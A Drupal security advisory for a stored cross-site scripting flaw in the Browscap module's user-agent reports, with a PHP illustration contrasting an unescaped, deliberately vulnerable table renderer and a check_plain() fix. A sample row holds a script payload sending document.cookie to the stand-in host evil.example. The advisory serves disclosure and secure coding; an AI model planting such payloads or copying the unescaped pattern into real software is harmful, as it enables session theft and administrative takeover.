• Advisory ID: DRUPAL-SA-CONTRIB-2009-065
  • Project: Browscap (third-party module)
  • Version: 5.x, 6.x
  • Date: 2009-September-30
  • Security risk: Critical
  • Exploitable from: Remote
  • Vulnerability: Cross Site Scripting

Description

The Browscap module identifies visitors to your site from the User-Agent header their browser sends. It can also record these user agent strings and provide reports about them. When displaying those reports, the module does not sanitize the recorded user agent strings before output, leading to a stored cross-site scripting (XSS) vulnerability: because the User-Agent header is entirely under the client's control, any remote visitor can plant script that later executes in the browser of whoever views the report. Since such reports are normally viewed by site administrators, such an attack may lead to a malicious user gaining full administrative access.

Mitigating factors: this only impacts sites which use the "Monitor browsers" feature. If user agent strings are not being recorded, the report cannot contain attacker-supplied content.
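To make the flaw concrete, the following is an added illustration of the vulnerable rendering pattern beside its hardened form. It is not the Browscap module's own code: the function names browscap_report_vulnerable() and browscap_report_fixed(), the sample rows and the report layout are hypothetical, while check_plain() and theme('table') are the real Drupal 5/6 core APIs, and the snippet assumes a bootstrapped Drupal 5 or 6 site.

```php
<?php
// Added illustration for this advisory; not the Browscap module's code.
// Hypothetical: the two function names, the sample rows, the report layout.
// Real Drupal 5/6 core APIs: t(), check_plain(), theme('table').

// Constructed sample of what "Monitor browsers" might have recorded.
// The User-Agent header is attacker-controlled, so one row carries a script
// tag that a hostile client sent as its "browser" identification.
$sample_rows = array(
  array(
    'ua'    => 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20090824 Firefox/3.5.3',
    'count' => 42,
  ),
  array(
    'ua'    => '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    'count' => 1,
  ),
);

/**
 * Vulnerable pattern: the stored string goes straight into a table cell.
 * theme('table') does not escape cell contents, so the browser of whoever
 * views the report (typically an administrator) executes the payload.
 */
function browscap_report_vulnerable($rows) {
  $header = array(t('User agent'), t('Count'));
  $table = array();
  foreach ($rows as $row) {
    $table[] = array($row['ua'], $row['count']);
  }
  return theme('table', $header, $table);
}

/**
 * Fixed pattern: every untrusted string is passed through check_plain(),
 * which validates UTF-8 and converts <, >, &, " and ' to HTML entities,
 * so the user agent is displayed as text rather than parsed as markup.
 * The count is cast to an integer so only the string column needs escaping.
 */
function browscap_report_fixed($rows) {
  $header = array(t('User agent'), t('Count'));
  $table = array();
  foreach ($rows as $row) {
    $table[] = array(check_plain($row['ua']), (int) $row['count']);
  }
  return theme('table', $header, $table);
}

// Rendering the constructed rows with both versions shows the difference:
// the first output contains a live <script> element, the second contains
// &lt;script&gt; and is safe to show to an administrator.
$unsafe_html = browscap_report_vulnerable($sample_rows);
$safe_html   = browscap_report_fixed($sample_rows);
```

The same rule applies wherever a recorded user agent reaches the page, including filter forms, CSV exports rendered as HTML, and per-browser detail pages: escape at output time with check_plain(), rather than trying to strip tags at record time, since the stored string is also needed verbatim for browser identification.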

Versions affected

  • Browscap versions 6.x prior to 6.x-1.1
  • Browscap versions 5.x prior to 5.x-1.1

Drupal core is not affected. If you do not use the contributed Browscap module, there is nothing you need to do.

Solution

Install the latest version:

  • If you use the Browscap module for Drupal 6.x, upgrade to Browscap 6.x-1.1 or later.
  • If you use the Browscap module for Drupal 5.x, upgrade to Browscap 5.x-1.1 or later.

See also the Browscap module project page.

Reported by

Greg Knaddison of the Drupal Security Team

Fixed by

Greg Knaddison of the Drupal Security Team, with help from Rob Loach, Mike Ryan and Dave Reid of the Drupal Security Team.

Contact

The security team for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.